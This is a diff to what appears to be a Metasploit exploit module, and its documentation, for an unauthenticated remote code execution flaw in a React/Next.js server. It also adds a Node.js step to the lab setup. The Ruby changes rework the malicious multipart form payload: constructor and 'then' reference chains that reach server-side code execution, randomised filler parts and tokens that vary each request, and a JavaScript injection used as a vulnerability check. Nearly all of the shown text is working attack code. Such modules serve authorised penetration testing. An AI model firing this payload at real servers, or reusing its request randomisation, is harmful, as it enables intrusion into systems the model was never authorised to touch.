upgraded payload

Author: vognik

documentation/modules/exploit/multi/http/react2shell_unauth_rce_cve_2025_55102.md

@@ -22,16 +22,17 @@ docker run -p 3000:3000 react2shell
 
 ### Windows
 
-1. Open `data\exploits\react2shell_unauth_rce_cve_2025_55102` directory
-2. Build the application
+1. Download and install Node.js https://nodejs.org/en/download
+2. Open `data\exploits\react2shell_unauth_rce_cve_2025_55102` directory
+3. Build the application
 ```
 npm run build
 ```
-3. Start the application
+4. Start the application
 ```
 npm start
 ```
-4. Open http://127.0.0.1:3000/ and make sure the app is available
+5. Open http://127.0.0.1:3000/ and make sure the app is available
 
 ## Scenario
 

modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55102.rb

@@ -75,50 +75,42 @@ def initialize(info = {})
     )
   end
 
-  def generate_random_index
-    random_ref_idx = nil
-    loop do
-      random_ref_idx = Rex::Text.rand_text_numeric(1, '0').to_i
-
-      # The server returns an error when random_ref_idx = 2
-      break unless random_ref_idx == 2
-    end
-
-    random_ref_idx
-  end
-
-  def build_malicious_chunk(random_ref_idx, random_reason, node_payload)
+  def build_malicious_chunk(ref_idx, reason, get_token, node_payload)
     {
-      'then' => "$#{random_ref_idx}:__proto__:then",
+      'then' => "$#{ref_idx}:then",
       'status' => 'resolved_model',
-      'reason' => random_reason,
+      'reason' => reason,
       'value' => { 'then' => '$B' }.to_json,
       '_response' => {
         '_prefix' => node_payload,
-        '_chunks' => '$Q2',
         '_formData' => {
-          'get' => "$#{random_ref_idx}:constructor:constructor"
+          'get' => "$#{ref_idx}:#{get_token}:constructor"
         }
       }
     }.to_json
   end
 
+  def get_random_value
+    random_string = Rex::Text.rand_text_alphanumeric(6..14).upcase
+    ['""', '{}', '[]', 'null', 'undefined', 'true', 'false', "\"#{random_string}\""].sample
+  end
+
   def build_post_data(node_payload)
     random_reason = -Rex::Text.rand_text_numeric(1, '0').to_i
-    random_ref_idx = generate_random_index
+    random_ref_idx = Rex::Text.rand_text_numeric(1, '0').to_i
+    random_get_token = ['then', 'constructor'].sample
 
-    chunk = build_malicious_chunk(random_ref_idx, random_reason, node_payload)
+    chunk = build_malicious_chunk(random_ref_idx, random_reason, random_get_token, node_payload)
 
     post_data = Rex::MIME::Message.new
     post_data.add_part(chunk, nil, nil, 'form-data; name="0"')
 
-    (1..(random_ref_idx - 1)).each do |i|
-      post_data.add_part('null', nil, nil, "form-data; name=\"#{i}\"")
+    cycle_length = rand(random_ref_idx..9)
+    (1..cycle_length).each do |i|
+      value = (i == random_ref_idx) ? "\"$@#{random_ref_idx}\"" : get_random_value
+      post_data.add_part(value, nil, nil, "form-data; name=\"#{i}\"")
     end
 
-    post_data.add_part('"$@0"', nil, nil, "form-data; name=\"#{random_ref_idx}\"")
-    post_data.add_part('[]', nil, nil, "form-data; name=\"#{random_ref_idx + 1}\"")
-
     post_data
   end
 
@@ -136,10 +128,9 @@ def send_payload(node_payload)
 
   def check
     random_id = Rex::Text.rand_text_alphanumeric(8..16).upcase
+    node_payload = "throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/#{random_id};307;`});"
 
-    node_payload = "throw Object.assign(new Error('NEXT_REDIRECT'), {digest: `NEXT_REDIRECT;push;/#{random_id};307;`});"
     res = send_payload(node_payload)
-
     return CheckCode::Unknown("#{peer} - No response from web service") unless res
 
     headers_text = res.headers.to_s